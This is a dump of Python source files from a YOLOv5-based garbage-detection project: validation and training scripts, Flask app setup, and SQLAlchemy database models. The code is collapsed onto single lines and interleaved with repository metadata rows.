time_sync() if cuda: im = im.to(device, non_blocking=True) targets = targets.to(device) im = im.half() if half else im.float() # uint8 to fp16/32 im /= 255 # 0 - 255 to 0.0 - 1.0 nb, _, height, width = im.shape # batch size, channels, height, width t2 = time_sync() dt[0] += t2 - t1 # Inference out, train_out = model(im) if training else model(im, augment=augment, val=True) # inference, loss outputs dt[1] += time_sync() - t2 # Loss if compute_loss: loss += compute_loss([x.float() for x in train_out], targets)[1] # box, obj, cls # NMS targets[:, 2:] *= torch.tensor((width, height, width, height), device=device) # to pixels lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling t3 = time_sync() out = non_max_suppression(out, conf_thres, iou_thres, labels=lb, multi_label=True, agnostic=single_cls) dt[2] += time_sync() - t3 # Metrics for si, pred in enumerate(out): labels = targets[targets[:, 0] == si, 1:] nl, npr = labels.shape[0], pred.shape[0] # number of labels, predictions path, shape = Path(paths[si]), shapes[si][0] correct = torch.zeros(npr, niou, dtype=torch.bool, device=device) # init seen += 1 if npr == 0: if nl: stats.append((correct, *torch.zeros((2, 0), device=device), labels[:, 0])) if plots: confusion_matrix.process_batch(detections=None, labels=labels[:, 0]) continue # Predictions if single_cls: pred[:, 5] = 0 predn = pred.clone() scale_coords(im[si].shape[1:], predn[:, :4], shape, shapes[si][1]) # native-space pred # Evaluate if nl: tbox = xywh2xyxy(labels[:, 1:5]) # target boxes scale_coords(im[si].shape[1:], tbox, shape, shapes[si][1]) # native-space labels labelsn = torch.cat((labels[:, 0:1], tbox), 1) # native-space labels correct = process_batch(predn, labelsn, iouv) if plots: confusion_matrix.process_batch(predn, labelsn) stats.append((correct, pred[:, 4], pred[:, 5], labels[:, 0])) # (correct, conf, pcls, tcls) # Save/log if save_txt: save_one_txt(predn, save_conf, shape, file=save_dir / 'labels' / f'{path.stem}.txt') if save_json: save_one_json(predn, jdict, path, class_map) # append to COCO-JSON dictionary callbacks.run('on_val_image_end', pred, predn, path, names, im[si]) # Plot images if plots and batch_i < 3: plot_images(im, targets, paths, save_dir / f'val_batch{batch_i}_labels.jpg', names) # labels plot_images(im, output_to_target(out), paths, save_dir / f'val_batch{batch_i}_pred.jpg', names) # pred callbacks.run('on_val_batch_end') # Compute metrics stats = [torch.cat(x, 0).cpu().numpy() for x in zip(*stats)] # to numpy if len(stats) and stats[0].any(): tp, fp, p, r, f1, ap, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names) ap50, ap = ap[:, 0], ap.mean(1) # [email protected], [email protected]:0.95 mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean() nt = np.bincount(stats[3].astype(int), minlength=nc) # number of targets per class # Print results pf = '%20s' + '%11i' * 2 + '%11.3g' * 4 # print format LOGGER.info(pf % ('all', seen, nt.sum(), mp, mr, map50, map)) if nt.sum() == 0: LOGGER.warning(f'WARNING: no labels found in {task} set, can not compute metrics without labels ‚ö†Ô∏è') # Print results per class if (verbose or (nc < 50 and not training)) and nc > 1 and len(stats): for i, c in enumerate(ap_class): LOGGER.info(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i])) # Print speeds t = tuple(x / seen * 1E3 for x in dt) # speeds per image if not training: shape = (batch_size, 3, imgsz, imgsz) LOGGER.info(f'Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS per image at shape {shape}' % t) # Plots if plots: confusion_matrix.plot(save_dir=save_dir, names=list(names.values())) callbacks.run('on_val_end') # Save JSON if save_json and len(jdict): w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights anno_json = str(Path(data.get('path', '../coco')) / 'annotations/instances_val2017.json') # annotations json pred_json = str(save_dir / f"{w}_predictions.json") # predictions json LOGGER.info(f'\nEvaluating pycocotools mAP... saving {pred_json}...') with open(pred_json, 'w') as f: json.dump(jdict, f) try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb check_requirements(['pycocotools']) from pycocotools.coco import COCO from pycocotools.cocoeval import COCOeval anno = COCO(anno_json) # init annotations api pred = anno.loadRes(pred_json) # init predictions api eval = COCOeval(anno, pred, 'bbox') if is_coco: eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.im_files] # image IDs to evaluate eval.evaluate() eval.accumulate() eval.summarize() map, map50 = eval.stats[:2] # update results ([email protected]:0.95, [email protected]) except Exception as e: LOGGER.info(f'pycocotools unable to run: {e}') # Return results model.float() # for training if not training: s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else '' LOGGER.info(f"Results saved to {colorstr('bold', save_dir)}{s}") maps = np.zeros(nc) + map for i, c in enumerate(ap_class): maps[c] = ap[i] return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t def parse_opt(): parser = argparse.ArgumentParser() parser.add_argument('--data', type=str, default=ROOT / 'data/coco128.yaml', help='dataset.yaml path') parser.add_argument('--weights', nargs='+', type=str, default=ROOT / 'yolov5s.pt', help='model.pt path(s)') parser.add_argument('--batch-size', type=int, default=32, help='batch size') parser.add_argument('--imgsz', '--img', '--img-size', type=int, default=640, help='inference size (pixels)') parser.add_argument('--conf-thres', type=float, default=0.001, help='confidence threshold') parser.add_argument('--iou-thres', type=float, default=0.6, help='NMS IoU threshold') parser.add_argument('--task', default='val', help='train, val, test, speed or study') parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu') parser.add_argument('--workers', type=int, default=8, help='max dataloader workers (per RANK in DDP mode)') parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset') parser.add_argument('--augment', action='store_true', help='augmented inference') parser.add_argument('--verbose', action='store_true', help='report mAP by class') parser.add_argument('--save-txt', action='store_true', help='save results to *.txt') parser.add_argument('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt') parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels') parser.add_argument('--save-json', action='store_true', help='save a COCO-JSON results file') parser.add_argument('--project', default=ROOT / 'runs/val', help='save to project/name') parser.add_argument('--name', default='exp', help='save to project/name') parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment') parser.add_argument('--half', action='store_true', help='use FP16 half-precision inference') parser.add_argument('--dnn', action='store_true', help='use OpenCV DNN for ONNX inference') opt = parser.parse_args() opt.data = check_yaml(opt.data) # check YAML opt.save_json |= opt.data.endswith('coco.yaml') opt.save_txt |= opt.save_hybrid print_args(vars(opt)) return opt def main(opt): check_requirements(requirements=ROOT / 'requirements.txt', exclude=('tensorboard', 'thop')) if opt.task in ('train', 'val', 'test'): # run normally if opt.conf_thres > 0.001: # https://github.com/ultralytics/yolov5/issues/1466 LOGGER.info(f'WARNING: confidence threshold {opt.conf_thres} > 0.001 produces invalid results ‚ö†Ô∏è') run(**vars(opt)) else: weights = opt.weights if isinstance(opt.weights, list) else [opt.weights] opt.half = True # FP16 for fastest results if opt.task == 'speed': # speed benchmarks # python val.py --task speed --data coco.yaml --batch 1 --weights yolov5n.pt yolov5s.pt... opt.conf_thres, opt.iou_thres, opt.save_json = 0.25, 0.45, False for opt.weights in weights: run(**vars(opt), plots=False) elif opt.task == 'study': # speed vs mAP benchmarks # python val.py --task study --data coco.yaml --iou 0.7 --weights yolov5n.pt yolov5s.pt... for opt.weights in weights: f = f'study_{Path(opt.data).stem}_{Path(opt.weights).stem}.txt' # filename to save to x, y = list(range(256, 1536 + 128, 128)), [] # x axis (image sizes), y axis for opt.imgsz in x: # img-size LOGGER.info(f'\nRunning {f} --imgsz {opt.imgsz}...') r, _, t = run(**vars(opt), plots=False) y.append(r + t) # results and times np.savetxt(f, y, fmt='%10.4g') # save os.system('zip -r study.zip study_*.txt') plot_val_study(x=x) # plot if __name__ == "__main__": opt = parse_opt() main(opt)
19,685
Python
.py
348
46.295977
120
0.588055
FlatWhite233/yolov5_garbage_detect
8
1
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,497
database_models.py
FlatWhite233_yolov5_garbage_detect/yolov5_garbage_detect-backend/database_models.py
from extensions import db from datetime import datetime class UserModel(db.Model): __tablename__ = 'user' id = db.Column(db.Integer, primary_key=True, autoincrement=True, comment='用户id') username = db.Column(db.String(100), nullable=False, comment='用户名') password = db.Column(db.String(500), nullable=False, comment='密码') email = db.Column(db.String(100), nullable=False, unique=True, comment='邮箱') join_time = db.Column(db.DateTime, default=datetime.now, comment='加入时间') status = db.Column(db.Boolean, default=True, comment='是否启用') # ForeignKey 默认注册为普通用户 role_id = db.Column(db.Integer, db.ForeignKey('role.id'), default=2, comment='用户角色') # Relationship roles = db.relationship('RoleModel', backref=db.backref('users', lazy='dynamic')) def to_dict(self): return { 'id': self.id, 'username': self.username, 'email': self.email, 'createTime': self.join_time.strftime('%Y-%m-%d %H:%M:%S'), 'status': self.status, 'roles': self.roles.role_name, } class RoleModel(db.Model): __tablename__ = 'role' id = db.Column(db.Integer, primary_key=True, autoincrement=True, comment='角色id') role_name = db.Column(db.String(100), nullable=False, comment='角色名称') role_desc = db.Column(db.String(100), nullable=False, comment='角色描述') class CaptchaModel(db.Model): __tablename__ = 'captcha' id = db.Column(db.Integer, primary_key=True, autoincrement=True) email = db.Column(db.String(100), nullable=True, comment='验证邮箱') captcha = db.Column(db.String(100), nullable=False, comment='验证码') create_time = db.Column(db.DateTime, default=datetime.now, comment='创建时间') is_used = db.Column(db.Boolean, default=False, comment='是否使用') class DatasetModel(db.Model): __tablename__ = 'dataset' id = db.Column(db.Integer, primary_key=True, autoincrement=True, comment='数据集id') dataset_name = db.Column(db.String(100), nullable=False, comment='数据集名称') class_num = db.Column(db.Integer, nullable=False, comment='类别数量') total_num = db.Column(db.Integer, nullable=False, comment='总数量') train_num = db.Column(db.Integer, nullable=False, comment='训练集数量') val_num = db.Column(db.Integer, nullable=False, comment='验证集数量') test_exist = db.Column(db.Boolean, default=True, nullable=False, comment='是否存在测试集') test_num = db.Column(db.Integer, nullable=True, comment='测试集数量') class ImageModel(db.Model): __tablename__ = 'image' id = db.Column(db.Integer, primary_key=True, autoincrement=True, comment='图片id') image_name = db.Column(db.String(100), nullable=False, comment='图片名称') image_absolute_path = db.Column(db.Text, nullable=True, comment='图片绝对路径') image_relative_path = db.Column(db.Text, nullable=True, comment='图片相对路径') image_type = db.Column(db.String(100), nullable=False, comment='图片类型') # ForeignKey dataset_id = db.Column(db.Integer, db.ForeignKey('dataset.id')) # Relationship dataset = db.relationship('DatasetModel', backref=db.backref('image')) class LabelModel(db.Model): __tablename__ = 'label' id = db.Column(db.Integer, primary_key=True, autoincrement=True, comment='标注id') label_name = db.Column(db.String(100), nullable=False, comment='标注名称') # ForeignKey dataset_id = db.Column(db.Integer, db.ForeignKey('dataset.id')) # Relationship dataset = db.relationship('DatasetModel', backref=db.backref('label')) class ImageLabelInfoModel(db.Model): __tablename__ = 'image_label_info' id = db.Column(db.Integer, primary_key=True, autoincrement=True, comment='图片标注信息id') # ForeignKey image_id = db.Column(db.Integer, db.ForeignKey('image.id'), comment='图片id') label_id = db.Column(db.Integer, db.ForeignKey('label.id'), comment='标注id') # Relationship image = db.relationship('ImageModel', backref=db.backref('image_label_info')) label = db.relationship('LabelModel', backref=db.backref('image_label_info')) class WeightsModel(db.Model): __tablename__ = 'weights' id = db.Column(db.Integer, primary_key=True, autoincrement=True, comment='权重id') weights_name = db.Column(db.String(100), nullable=False, comment='权重名称') weights_relative_path = db.Column(db.Text, nullable=False, comment='权重相对路径') weights_absolute_path = db.Column(db.Text, nullable=True, comment='权重绝对路径') weights_version = db.Column(db.String(100), nullable=False, comment='权重版本') enable = db.Column(db.Boolean, default=False, nullable=False, comment='是否启用') # ForeignKey dataset_id = db.Column(db.Integer, db.ForeignKey('dataset.id')) # Relationship dataset = db.relationship('DatasetModel', backref=db.backref('weights')) class DetectResultModel(db.Model): __tablename__ = 'detect_result' id = db.Column(db.Integer, primary_key=True, autoincrement=True, comment='检测结果id') detect_result = db.Column(db.Text, nullable=False, comment='检测结果') detect_result_image_name = db.Column(db.String(100), nullable=False, comment='检测结果图片名称') detect_time = db.Column(db.DateTime, default=datetime.now, comment='检测时间') # ForeignKey user_id = db.Column(db.Integer, db.ForeignKey('user.id')) # Relationship user = db.relationship('UserModel', backref=db.backref('detect_result'))
5,662
Python
.py
95
50.568421
92
0.698229
FlatWhite233/yolov5_garbage_detect
8
1
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,498
app.py
FlatWhite233_yolov5_garbage_detect/yolov5_garbage_detect-backend/app.py
import sqlalchemy import config import argparse import os from flask import Flask, g, session from flask_migrate import Migrate from flask_jwt_extended import JWTManager from extensions import * from utils.backend_utils.colorprinter import * from utils.backend_utils.model_handler import load_model from database_models import * from blueprints.auth_bp import bp as auth_bp from blueprints.server_bp import bp as server_bp from blueprints.user_manage_bp import bp as user_manage_bp from blueprints.detect_demo_bp import bp as detect_demo_bp from blueprints.detect_bp import bp as detect_bp ''' 前后端code约定: code: 0 成功 前端无消息弹窗 code: 1 失败 前端无消息弹窗 code: 200 前端消息弹窗Success code: 201 前端消息弹窗Error code: 202 前端消息弹窗Warning code: 203 前端消息弹窗Info code: 204 前端通知弹窗Success code: 205 前端通知弹窗Error code: 206 前端通知弹窗Warning code: 207 前端通知弹窗Info ''' app = Flask(__name__) app.config.from_object(config) db.init_app(app) jwt = JWTManager(app) mail.init_app(app) ''' flask db init flask db migrate flask db upgrade ''' migrate = Migrate(app, db) app.register_blueprint(auth_bp, url_prefix='/auth') app.register_blueprint(server_bp, url_prefix='/server') app.register_blueprint(user_manage_bp, url_prefix='/user-manage') app.register_blueprint(detect_demo_bp, url_prefix='/detect-demo') app.register_blueprint(detect_bp, url_prefix='/detect') # 注册一个函数,该函数在第一次请求之前运行 @app.before_first_request def load_default_model(): g.repo_dir = repo_dir # print_cyan(f'repo_dir: {repo_dir}') g.weights_path = weights_path g.model_load_path = model_load_path # 加载默认调用权重并保存在g.model中 g.model = default_model g.weights_name = WeightsModel.query.filter_by(weights_relative_path=weights_path).first().weights_name # 同时把当前权重相关调用信息存储进session # 后续如果调用的非默认权重则重新根据session中的信息加载模型 session['repo_dir'] = g.repo_dir session['weights_path'] = g.weights_path session['model_load_path'] = g.model_load_path session['weights_name'] = g.weights_name session['default_weights_name'] = g.weights_name # 注册一个函数,该函数在每次请求之前运行 @app.before_request def before_request(): # 如果session中存储当前调用权重信息 # 如果session中的weights_name与default_weights_name则重新加载模型 g.repo_dir = session['repo_dir'] g.weights_path = session['weights_path'] g.model_load_path = session['model_load_path'] g.weights_name = session['weights_name'] g.model = default_model def test_database_connection(): with app.app_context(): with db.engine.connect() as conn: res = conn.execute(sqlalchemy.text('select 1')) if res.fetchone()[0] == 1: print_green('Database connection successful') else: print_red('Database connection failed') if __name__ == "__main__": repo_dir = os.getcwd() # weights_path = 'weights/yolov5-7.0/COCO_yolov5s6.pt' # weights_path = 'weights/yolov5-6.2/Sample_yolov5s6_300_epochs.pt' weights_path = 'weights/yolov5-3.1/TACO_yolov5s_300_epochs.pt' # weights_path = 'weights/yolov5-3.1/Garbage_yolov5s_300_epochs.pt' model_load_path = os.path.join(repo_dir, weights_path) parser = argparse.ArgumentParser(description="Flask app exposing yolov5 models") parser.add_argument("--port", default=5003, type=int, help="port number") args = parser.parse_args() # webapp启动后加载默认调用权重 default_model = load_model(repo_dir, model_load_path) test_database_connection() print_cyan('项目已启动') print_cyan(f'当前工作目录: {repo_dir}') print_cyan(f'当前调用权重: {weights_path}') print_cyan(f'模型推断请访问: http://localhost:{args.port}/detect-demo/upload') app.run(host="0.0.0.0", port=args.port, debug=True)
4,084
Python
.py
98
33.530612
106
0.734508
FlatWhite233/yolov5_garbage_detect
8
1
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,499
train.py
FlatWhite233_yolov5_garbage_detect/yolov5_garbage_detect-backend/train.py
# YOLOv5 🚀 by Ultralytics, GPL-3.0 license """ Train a YOLOv5 model on a custom dataset. Models and datasets download automatically from the latest YOLOv5 release. Models: https://github.com/ultralytics/yolov5/tree/master/models Datasets: https://github.com/ultralytics/yolov5/tree/master/data Tutorial: https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data Usage: $ python path/to/train.py --data coco128.yaml --weights yolov5s.pt --img 640 # from pretrained (RECOMMENDED) $ python path/to/train.py --data coco128.yaml --weights '' --cfg yolov5s.yaml --img 640 # from scratch """ import argparse import math import os import random import sys import time from copy import deepcopy from datetime import datetime from pathlib import Path import numpy as np import torch import torch.distributed as dist import torch.nn as nn import yaml from torch.optim import lr_scheduler from tqdm import tqdm FILE = Path(__file__).resolve() ROOT = FILE.parents[0] # YOLOv5 root directory if str(ROOT) not in sys.path: sys.path.append(str(ROOT)) # add ROOT to PATH ROOT = Path(os.path.relpath(ROOT, Path.cwd())) # relative import val # for end-of-epoch mAP from models.experimental import attempt_load from models.yolo import Model from utils.autoanchor import check_anchors from utils.autobatch import check_train_batch_size from utils.callbacks import Callbacks from utils.dataloaders import create_dataloader from utils.downloads import attempt_download, is_url from utils.general import (LOGGER, check_amp, check_dataset, check_file, check_git_status, check_img_size, check_requirements, check_suffix, check_yaml, colorstr, get_latest_run, increment_path, init_seeds, intersect_dicts, labels_to_class_weights, labels_to_image_weights, methods, one_cycle, print_args, print_mutation, strip_optimizer, yaml_save) from utils.loggers import Loggers from utils.loggers.wandb.wandb_utils import check_wandb_resume from utils.loss import ComputeLoss from utils.metrics import fitness from utils.plots import plot_evolve, plot_labels from utils.torch_utils import (EarlyStopping, ModelEMA, de_parallel, select_device, smart_DDP, smart_optimizer, smart_resume, torch_distributed_zero_first) LOCAL_RANK = int(os.getenv('LOCAL_RANK', -1)) # https://pytorch.org/docs/stable/elastic/run.html RANK = int(os.getenv('RANK', -1)) WORLD_SIZE = int(os.getenv('WORLD_SIZE', 1)) def train(hyp, opt, device, callbacks): # hyp is path/to/hyp.yaml or hyp dictionary save_dir, epochs, batch_size, weights, single_cls, evolve, data, cfg, resume, noval, nosave, workers, freeze = \ Path(opt.save_dir), opt.epochs, opt.batch_size, opt.weights, opt.single_cls, opt.evolve, opt.data, opt.cfg, \ opt.resume, opt.noval, opt.nosave, opt.workers, opt.freeze callbacks.run('on_pretrain_routine_start') # Directories w = save_dir / 'weights' # weights dir (w.parent if evolve else w).mkdir(parents=True, exist_ok=True) # make dir last, best = w / 'last.pt', w / 'best.pt' # Hyperparameters if isinstance(hyp, str): with open(hyp, errors='ignore') as f: hyp = yaml.safe_load(f) # load hyps dict LOGGER.info(colorstr('hyperparameters: ') + ', '.join(f'{k}={v}' for k, v in hyp.items())) opt.hyp = hyp.copy() # for saving hyps to checkpoints # Save run settings if not evolve: yaml_save(save_dir / 'hyp.yaml', hyp) yaml_save(save_dir / 'opt.yaml', vars(opt)) # Loggers data_dict = None if RANK in {-1, 0}: loggers = Loggers(save_dir, weights, opt, hyp, LOGGER) # loggers instance if loggers.clearml: data_dict = loggers.clearml.data_dict # None if no ClearML dataset or filled in by ClearML if loggers.wandb: data_dict = loggers.wandb.data_dict if resume: weights, epochs, hyp, batch_size = opt.weights, opt.epochs, opt.hyp, opt.batch_size # Register actions for k in methods(loggers): callbacks.register_action(k, callback=getattr(loggers, k)) # Config plots = not evolve and not opt.noplots # create plots cuda = device.type != 'cpu' init_seeds(opt.seed + 1 + RANK, deterministic=True) with torch_distributed_zero_first(LOCAL_RANK): data_dict = data_dict or check_dataset(data) # check if None train_path, val_path = data_dict['train'], data_dict['val'] nc = 1 if single_cls else int(data_dict['nc']) # number of classes names = ['item'] if single_cls and len(data_dict['names']) != 1 else data_dict['names'] # class names assert len(names) == nc, f'{len(names)} names found for nc={nc} dataset in {data}' # check is_coco = isinstance(val_path, str) and val_path.endswith('coco/val2017.txt') # COCO dataset # Model check_suffix(weights, '.pt') # check weights pretrained = weights.endswith('.pt') if pretrained: with torch_distributed_zero_first(LOCAL_RANK): weights = attempt_download(weights) # download if not found locally ckpt = torch.load(weights, map_location='cpu') # load checkpoint to CPU to avoid CUDA memory leak model = Model(cfg or ckpt['model'].yaml, ch=3, nc=nc, anchors=hyp.get('anchors')).to(device) # create exclude = ['anchor'] if (cfg or hyp.get('anchors')) and not resume else [] # exclude keys csd = ckpt['model'].float().state_dict() # checkpoint state_dict as FP32 csd = intersect_dicts(csd, model.state_dict(), exclude=exclude) # intersect model.load_state_dict(csd, strict=False) # load LOGGER.info(f'Transferred {len(csd)}/{len(model.state_dict())} items from {weights}') # report else: model = Model(cfg, ch=3, nc=nc, anchors=hyp.get('anchors')).to(device) # create amp = check_amp(model) # check AMP # Freeze freeze = [f'model.{x}.' for x in (freeze if len(freeze) > 1 else range(freeze[0]))] # layers to freeze for k, v in model.named_parameters(): v.requires_grad = True # train all layers # v.register_hook(lambda x: torch.nan_to_num(x)) # NaN to 0 (commented for erratic training results) if any(x in k for x in freeze): LOGGER.info(f'freezing {k}') v.requires_grad = False # Image size gs = max(int(model.stride.max()), 32) # grid size (max stride) imgsz = check_img_size(opt.imgsz, gs, floor=gs * 2) # verify imgsz is gs-multiple # Batch size if RANK == -1 and batch_size == -1: # single-GPU only, estimate best batch size batch_size = check_train_batch_size(model, imgsz, amp) loggers.on_params_update({"batch_size": batch_size}) # Optimizer nbs = 64 # nominal batch size accumulate = max(round(nbs / batch_size), 1) # accumulate loss before optimizing hyp['weight_decay'] *= batch_size * accumulate / nbs # scale weight_decay optimizer = smart_optimizer(model, opt.optimizer, hyp['lr0'], hyp['momentum'], hyp['weight_decay']) # Scheduler if opt.cos_lr: lf = one_cycle(1, hyp['lrf'], epochs) # cosine 1->hyp['lrf'] else: lf = lambda x: (1 - x / epochs) * (1.0 - hyp['lrf']) + hyp['lrf'] # linear scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lf) # plot_lr_scheduler(optimizer, scheduler, epochs) # EMA ema = ModelEMA(model) if RANK in {-1, 0} else None # Resume best_fitness, start_epoch = 0.0, 0 if pretrained: if resume: best_fitness, start_epoch, epochs = smart_resume(ckpt, optimizer, ema, weights, epochs, resume) del ckpt, csd # DP mode if cuda and RANK == -1 and torch.cuda.device_count() > 1: LOGGER.warning('WARNING: DP not recommended, use torch.distributed.run for best DDP Multi-GPU results.\n' 'See Multi-GPU Tutorial at https://github.com/ultralytics/yolov5/issues/475 to get started.') model = torch.nn.DataParallel(model) # SyncBatchNorm if opt.sync_bn and cuda and RANK != -1: model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model).to(device) LOGGER.info('Using SyncBatchNorm()') # Trainloader train_loader, dataset = create_dataloader(train_path, imgsz, batch_size // WORLD_SIZE, gs, single_cls, hyp=hyp, augment=True, cache=None if opt.cache == 'val' else opt.cache, rect=opt.rect, rank=LOCAL_RANK, workers=workers, image_weights=opt.image_weights, quad=opt.quad, prefix=colorstr('train: '), shuffle=True) labels = np.concatenate(dataset.labels, 0) mlc = int(labels[:, 0].max()) # max label class assert mlc < nc, f'Label class {mlc} exceeds nc={nc} in {data}. Possible class labels are 0-{nc - 1}' # Process 0 if RANK in {-1, 0}: val_loader = create_dataloader(val_path, imgsz, batch_size // WORLD_SIZE * 2, gs, single_cls, hyp=hyp, cache=None if noval else opt.cache, rect=True, rank=-1, workers=workers * 2, pad=0.5, prefix=colorstr('val: '))[0] if not resume: if plots: plot_labels(labels, names, save_dir) # Anchors if not opt.noautoanchor: check_anchors(dataset, model=model, thr=hyp['anchor_t'], imgsz=imgsz) model.half().float() # pre-reduce anchor precision callbacks.run('on_pretrain_routine_end') # DDP mode if cuda and RANK != -1: model = smart_DDP(model) # Model attributes nl = de_parallel(model).model[-1].nl # number of detection layers (to scale hyps) hyp['box'] *= 3 / nl # scale to layers hyp['cls'] *= nc / 80 * 3 / nl # scale to classes and layers hyp['obj'] *= (imgsz / 640) ** 2 * 3 / nl # scale to image size and layers hyp['label_smoothing'] = opt.label_smoothing model.nc = nc # attach number of classes to model model.hyp = hyp # attach hyperparameters to model model.class_weights = labels_to_class_weights(dataset.labels, nc).to(device) * nc # attach class weights model.names = names # Start training t0 = time.time() nb = len(train_loader) # number of batches nw = max(round(hyp['warmup_epochs'] * nb), 100) # number of warmup iterations, max(3 epochs, 100 iterations) # nw = min(nw, (epochs - start_epoch) / 2 * nb) # limit warmup to < 1/2 of training last_opt_step = -1 maps = np.zeros(nc) # mAP per class results = (0, 0, 0, 0, 0, 0, 0) # P, R, [email protected], [email protected], val_loss(box, obj, cls) scheduler.last_epoch = start_epoch - 1 # do not move scaler = torch.cuda.amp.GradScaler(enabled=amp) stopper, stop = EarlyStopping(patience=opt.patience), False compute_loss = ComputeLoss(model) # init loss class callbacks.run('on_train_start') LOGGER.info(f'Image sizes {imgsz} train, {imgsz} val\n' f'Using {train_loader.num_workers * WORLD_SIZE} dataloader workers\n' f"Logging results to {colorstr('bold', save_dir)}\n" f'Starting training for {epochs} epochs...') for epoch in range(start_epoch, epochs): # epoch ------------------------------------------------------------------ callbacks.run('on_train_epoch_start') model.train() # Update image weights (optional, single-GPU only) if opt.image_weights: cw = model.class_weights.cpu().numpy() * (1 - maps) ** 2 / nc # class weights iw = labels_to_image_weights(dataset.labels, nc=nc, class_weights=cw) # image weights dataset.indices = random.choices(range(dataset.n), weights=iw, k=dataset.n) # rand weighted idx # Update mosaic border (optional) # b = int(random.uniform(0.25 * imgsz, 0.75 * imgsz + gs) // gs * gs) # dataset.mosaic_border = [b - imgsz, -b] # height, width borders mloss = torch.zeros(3, device=device) # mean losses if RANK != -1: train_loader.sampler.set_epoch(epoch) pbar = enumerate(train_loader) LOGGER.info(('\n' + '%10s' * 7) % ('Epoch', 'gpu_mem', 'box', 'obj', 'cls', 'labels', 'img_size')) if RANK in {-1, 0}: pbar = tqdm(pbar, total=nb, bar_format='{l_bar}{bar:10}{r_bar}{bar:-10b}') # progress bar optimizer.zero_grad() for i, (imgs, targets, paths, _) in pbar: # batch ------------------------------------------------------------- callbacks.run('on_train_batch_start') ni = i + nb * epoch # number integrated batches (since train start) imgs = imgs.to(device, non_blocking=True).float() / 255 # uint8 to float32, 0-255 to 0.0-1.0 # Warmup if ni <= nw: xi = [0, nw] # x interp # compute_loss.gr = np.interp(ni, xi, [0.0, 1.0]) # iou loss ratio (obj_loss = 1.0 or iou) accumulate = max(1, np.interp(ni, xi, [1, nbs / batch_size]).round()) for j, x in enumerate(optimizer.param_groups): # bias lr falls from 0.1 to lr0, all other lrs rise from 0.0 to lr0 x['lr'] = np.interp(ni, xi, [hyp['warmup_bias_lr'] if j == 0 else 0.0, x['initial_lr'] * lf(epoch)]) if 'momentum' in x: x['momentum'] = np.interp(ni, xi, [hyp['warmup_momentum'], hyp['momentum']]) # Multi-scale if opt.multi_scale: sz = random.randrange(imgsz * 0.5, imgsz * 1.5 + gs) // gs * gs # size sf = sz / max(imgs.shape[2:]) # scale factor if sf != 1: ns = [math.ceil(x * sf / gs) * gs for x in imgs.shape[2:]] # new shape (stretched to gs-multiple) imgs = nn.functional.interpolate(imgs, size=ns, mode='bilinear', align_corners=False) # Forward with torch.cuda.amp.autocast(amp): pred = model(imgs) # forward loss, loss_items = compute_loss(pred, targets.to(device)) # loss scaled by batch_size if RANK != -1: loss *= WORLD_SIZE # gradient averaged between devices in DDP mode if opt.quad: loss *= 4. # Backward scaler.scale(loss).backward() # Optimize - https://pytorch.org/docs/master/notes/amp_examples.html if ni - last_opt_step >= accumulate: scaler.unscale_(optimizer) # unscale gradients torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm=10.0) # clip gradients scaler.step(optimizer) # optimizer.step scaler.update() optimizer.zero_grad() if ema: ema.update(model) last_opt_step = ni # Log if RANK in {-1, 0}: mloss = (mloss * i + loss_items) / (i + 1) # update mean losses mem = f'{torch.cuda.memory_reserved() / 1E9 if torch.cuda.is_available() else 0:.3g}G' # (GB) pbar.set_description(('%10s' * 2 + '%10.4g' * 5) % (f'{epoch}/{epochs - 1}', mem, *mloss, targets.shape[0], imgs.shape[-1])) callbacks.run('on_train_batch_end', ni, model, imgs, targets, paths, plots) if callbacks.stop_training: return # end batch ------------------------------------------------------------------------------------------------ # Scheduler lr = [x['lr'] for x in optimizer.param_groups] # for loggers scheduler.step() if RANK in {-1, 0}: # mAP callbacks.run('on_train_epoch_end', epoch=epoch) ema.update_attr(model, include=['yaml', 'nc', 'hyp', 'names', 'stride', 'class_weights']) final_epoch = (epoch + 1 == epochs) or stopper.possible_stop if not noval or final_epoch: # Calculate mAP results, maps, _ = val.run(data_dict, batch_size=batch_size // WORLD_SIZE * 2, imgsz=imgsz, half=amp, model=ema.ema, single_cls=single_cls, dataloader=val_loader, save_dir=save_dir, plots=False, callbacks=callbacks, compute_loss=compute_loss) # Update best mAP fi = fitness(np.array(results).reshape(1, -1)) # weighted combination of [P, R, [email protected], [email protected]] stop = stopper(epoch=epoch, fitness=fi) # early stop check if fi > best_fitness: best_fitness = fi log_vals = list(mloss) + list(results) + lr callbacks.run('on_fit_epoch_end', log_vals, epoch, best_fitness, fi) # Save model if (not nosave) or (final_epoch and not evolve): # if save ckpt = { 'epoch': epoch, 'best_fitness': best_fitness, 'model': deepcopy(de_parallel(model)).half(), 'ema': deepcopy(ema.ema).half(), 'updates': ema.updates, 'optimizer': optimizer.state_dict(), 'wandb_id': loggers.wandb.wandb_run.id if loggers.wandb else None, 'opt': vars(opt), 'date': datetime.now().isoformat()} # Save last, best and delete torch.save(ckpt, last) if best_fitness == fi: torch.save(ckpt, best) if opt.save_period > 0 and epoch % opt.save_period == 0: torch.save(ckpt, w / f'epoch{epoch}.pt') del ckpt callbacks.run('on_model_save', last, epoch, final_epoch, best_fitness, fi) # EarlyStopping if RANK != -1: # if DDP training broadcast_list = 